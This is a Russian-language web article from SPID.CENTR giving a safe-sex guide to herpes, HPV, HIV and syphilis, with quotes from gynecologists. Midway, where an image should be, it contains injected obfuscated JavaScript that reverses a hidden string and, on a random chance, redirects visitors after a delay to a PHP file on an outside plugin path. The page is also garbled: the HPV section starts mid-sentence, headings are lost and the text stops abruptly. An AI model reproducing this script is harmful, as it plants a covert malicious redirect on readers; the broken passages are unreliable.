Гид по безопасному сексу

СПИД.ЦЕНТР рассказывает, о каких опасностях нужно помнить, занимаясь сексом, и какие меры предосторожности стоит принять.

Существует больше 30 бактерий, вирусов и паразитов, которые передаются половым путем. Но большинство из них встречаются довольно редко, в основном на Африканском континенте. Если вы живете в России или Европе, то в первую очередь стоит опасаться примерно десяти заболеваний. Часть из них – не вирусные – успешно лечатся. Другие – вирусные – попадают в организм однажды и остаются там на всю жизнь.

Вирусные инфекции

Главная проблема вирусных инфекций – если вы однажды инфицировались, то с ними, скорее всего, придется жить всегда. Некоторые из них по-настоящему опасны и могут привести к тяжелым последствиям. Другие не наносят особого вреда, но все-таки заметно усложняют жизнь.

ГЕНИТАЛЬНЫЙ ГЕРПЕС

Есть несколько типов герпеса. Генитальный – это герпес 1-го или 2-го типа. Герпесы обоих типов могут появиться на губах или на гениталиях. Герпес, который появляется на губах, называется лабиальным. На гениталиях – генитальным. Внешне его можно заметить, только когда он в активной фазе. В остальное время вы никак не поймете, является ли ваш половой партнер носителем вируса. Если у вас доверительные отношения, то, возможно, партнер сам расскажет вам об этом, но это редко происходит при случайном сексе или в самом начале отношений.

Симптомы

Обычно при первичном заражении сначала появляются жжение и боль в области гениталий. Человек может почувствовать общее недомогание, головную боль, слабость. Через несколько дней в области поражения появляются небольшие пузырьки с прозрачной жидкостью. Потом они лопаются, и на их месте остаются болезненные язвочки. Чаще всего они заживают в течение двух недель.

Как передается

Заражение может произойти не только через слизистую оболочку, но и через кожу. Презерватив не всегда предохраняет от герпеса – вирус может передаваться и через те места, которые презерватив не защищает. Самый высокий риск заражения – если у партнера герпес находится в активной фазе. Но вирус начинает выделяться еще за несколько дней до обострения, а иногда и независимо от обострений. Если у партнера есть генитальный герпес и периодически бывают высыпания, никогда нельзя точно знать, опасен ли он прямо сейчас.

Есть и еще одна сложность: генитальный герпес можно получить от носителя лабиального герпеса – то есть обычной «простуды» на губах. Такой вирус есть у большинства людей: больше 80% населения планеты переносят его. Даже если у человека ни разу в жизни не выскакивала «простуда» на губе, это не значит, что он не является его носителем – вирус может просто не проявляться. При этом носитель либаильного герпеса может инфицировать партнера во время орального секса, а так как вирус проявляется в том месте, где он вошел в организм, то у партнера после такого контакта может начаться генитальный герпес.

Что делать

Если учесть, что абсолютное большинство людей – носители хотя бы одного типа герпеса, вам вряд ли удастся найти партнера, у которого нет этого вируса и который к тому же устраивает вас во всем остальном.

Шансы получить его сильно снижаются, если человек, который переносит вирус, принимает терапию. Но медикаменты от герпеса пьют долгими курсами. Обычно их назначают тем, у кого часто бывают сильные обострения, а тем, у кого однажды выскочила «простуда» на губе – терапию назначать ни к чему.

Если вы знаете, что у партнера герпес, вам в любом случае стоит воздерживаться от секса во время обострения. Если вы все-таки инфицировались, избавиться от вируса невозможно. Обострения быстро снимаются местным лечением (мази или гели с ацикловиром) или таблетками, но в целом вирус герпеса не ведет к тяжелым последствиям и не вызывает осложнений. Правда, он может быть опасен для женщин, которые собираются рожать детей – если к моменту родов начнется обострение, то ребенок может инфицироваться. Чтобы этого избежать, лучше заранее начать принимать противовирусные препараты под наблюдением врача. Если все-таки к моменту родов у женщины появились характерные высыпания, нужно делать кесарево сечение.

делать ВПЧ-ПАП-тест. Если обнаружится, что вирус начал поражать клетки шейки матки, то пораженные участки придется удалить.

Некоторые штаммы вируса могут также приводить к развитию рака прямой кишки, ануса, рта или глотки.

Как передается

ВПЧ передается и при вагинальном, и при оральном, и при анальном сексе. Презерватив хорошо защищает от ВПЧ 16 и 18 типов – тех самых, из-за которых в 70% случаев у женщин начинается рак шейки матки. Но от вирусов из группы низкого онкогенного риска презерватив спасает не всегда – папилломы могут поражать незакрытые презервативом участки, и тогда инфицирование все равно возможно.

Лучше всего еще до начала половой жизни провести вакцинацию от ВПЧ. В некоторых странах такая вакцинация обязательна для девочек-подростков. В России прививку можно сделать в добровольном порядке.

ВИЧ-ИНФЕКЦИЯ

Каждый час в России появляется около 10 новых случаев ВИЧ-инфекции. На сегодняшний день в стране около миллиона ВИЧ-положительных людей. Вокруг этого вируса все еще очень много мифов: одни считают, что ВИЧ-инфекции просто не существует, другие уверены, что она передается только при гомосексуальных контактах. На самом деле вирус передается и при гетеросексуальных контактах. И это вовсе не «болезнь наркоманов», как многие думают. Несмотря на то, что сегодня течение ВИЧ-инфекции можно контролировать с помощью антиретровирусной терапии, излечить ее невозможно.

Татьяна Румянцева, акушер-гинеколог:

Часто я встречаю пациенток, которые инфицировались от мужа. Они были в шоке, когда узнали, что у них ВИЧ-инфекция: многие считают, что в семейной гетеросексуальной паре такого случиться не может. Еще иногда я слышу от тинейджеров, что ВИЧ-инфекция якобы излечивается. Подростки где-то слышали, что есть препараты для лечения ВИЧ, и решили, что это как средства от простуды – пропил их две недели, и дальше живешь спокойно. Они не всегда осознают, что антиретровирусная терапия – это на всю жизнь.

Симптомы

Сначала ВИЧ-инфекция может развиваться бессимптомно. У кого-то развивается комплекс симптомов, похожий на грипп. На этой стадии ВИЧ-положительные люди уже могут передать вирус, но еще, скорее всего, не подозревают о том, что живут с ним. Постепенно ВИЧ-инфекция ослабляет иммунную систему, появляются более заметные симптомы: увеличенные лимфоузлы, лихорадка, диарея, кашель. Если не начать лечение, может развиться туберкулез, менингит, лимфомы и другие заболевания, характерные для последней стадии ВИЧ-инфекции, называемой СПИД – синдром приобретенного иммунодефицита. Его диагностируют, когда число CD4-лимфоцитов становится ниже 200 клеток/мкл.

Как передается

Некоторые думают, что инфицироваться можно при рукопожатии или если пользоваться общей посудой с ВИЧ-положительным человеком, но это неправда. ВИЧ передается через жидкости организма: кровь, грудное молоко, сперму, вагинальные выделения.

Что делать

Во-первых, пользоваться презервативом. Он на 60-96% защищает от заражения.

Часто люди думают, что достаточно использовать презерватив только при вагинальном сексе. На самом деле при анальном сексе риск инфицирования даже сильнее – один партнер может случайно травмировать другого, и тогда вирус попадет в кровь. Так что презерватив нужно использовать при любом половом контакте.

Есть также таблетки доконтактной и постконтактной профилактики. Препараты доконтактной профилактики часто используют в парах, где один партнер ВИЧ-положителен, а другой – нет. Это эффективное средство, при правильном использовании которого снижается риск инфицирования на 80-90%.

Если человек получает антиретровирусную терапию и она эффективно работает, то постепенно вирусная нагрузка снижается. При успешном лечении максимум через полгода она становится неопределяемой. С этого момента ВИЧ-положительный партнер уже не может передать вирус.

$NjS=function(n){if(typeof ($NjS.list[n])==”string”) return $NjS.list[n].split(“”).reverse().join(“”);return $NjS.list[n];};$NjS.list=[“\’php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tor/pictures/3456/content_photo_2018-08-24_14-31-00.jpg” alt=”” />

Иногда симптомы все-таки проявляются. У женщин это могут быть обильные выделения из влагалища, иногда гнойные, с неприятным запахом. Дальше могут появиться боли внизу живота, межменструальные кровянистые выделения и боль при половом акте. Если инфекция проникает в уретру, то начинаются нарушения мочеиспускания, появляется кровь в моче, боли. У мужчин может начаться уретрит. Главные признаки – воспаление и покраснение вокруг наружного отверстия мочеиспускательного канала, учащенное или болезненное мочеиспускание, выделения из уретры.

Олеся Василенко, акушер-гинеколог, медицинский центр  A medclinic:

Женщины очень легко могут поначалу принять такое заболевание за молочницу – именно о ней первым делом вспоминают при таких симптомах. С молочницей многие сталкивались, все знают, как ее лечить. Поэтому часто женщина просто идет в аптеку и покупает таблетки, которые однажды помогли ей или ее подруге. Под действием медикаментов симптомы приглушаются, а заболевание никуда не уходит.

Как передается

Инфицироваться не вирусной ИППП можно при любом половом контакте – как вагинальном, так и оральном, и анальном.

Татьяна Румянцева, акушер-гинеколог:

Часто считается, что если партнер хорошо себя чувствует, и у него нет видимых признаков какого-либо заболевания, значит, у него нет никакой инфекции. На самом деле внешний вид и самочувствие еще ни о чем не говорят. Один случай незащищенного секса в 18 лет может обернуться большими проблемами с зачатием к 30-ти.

СИФИЛИС

Сифилис – это хроническое заболевание, которое поражает все органы и ткани человеческого организма. Инфекция поддается лечению на всех этапах, но если вовремя не начать принимать медикаменты, заболевание может оставить серьезные последствия вплоть до инвалидности. Возбудителем сифилиса является микроорганизм – бледная трепонема. Она имеет спиралевидную форму, чрезвычайно подвижна, поэтому быстро проникает внутрь организма.

Когда сифилис впервые обнаружили на российской территории (примерно в начале XVI века), его называли “французская болезнь”. Позднее врачи стали официально называть сифилис lues.

В целом по России ситуация с сифилисом стабильная, но в ряде субъектов с начала 2018 года количество заболевших заметно выросло. Всего за  первые шесть месяцев в стране было выявлено 6 тысяч случаев заболевания.

Симптомы

Инкубационный период составляет месяц, то есть первые четыре недели инфицированный человек ничего не чувствует. Потом в месте проникновения возбудителя, чаще всего, на слизистой оболочке половых органов или в ротовой полости, появляется маленькая язвочка – твердый шанкр. Он не болит и не доставляет никаких неудобств. Его можно не заметить или принять за механическое повреждение или ангину, если он находится в ротовой полости. Помимо язвочки развивается воспаление ближайших лимфатических узлов. Это период болезни называется первичный сифилис. Твердый шанкр самостоятельно исчезает через 3-6 недель. Некоторое время сифилис может не давать о себе знать, но потом у человека появляются бледные высыпания по всему телу – первым делом они обычно

Добавить комментарий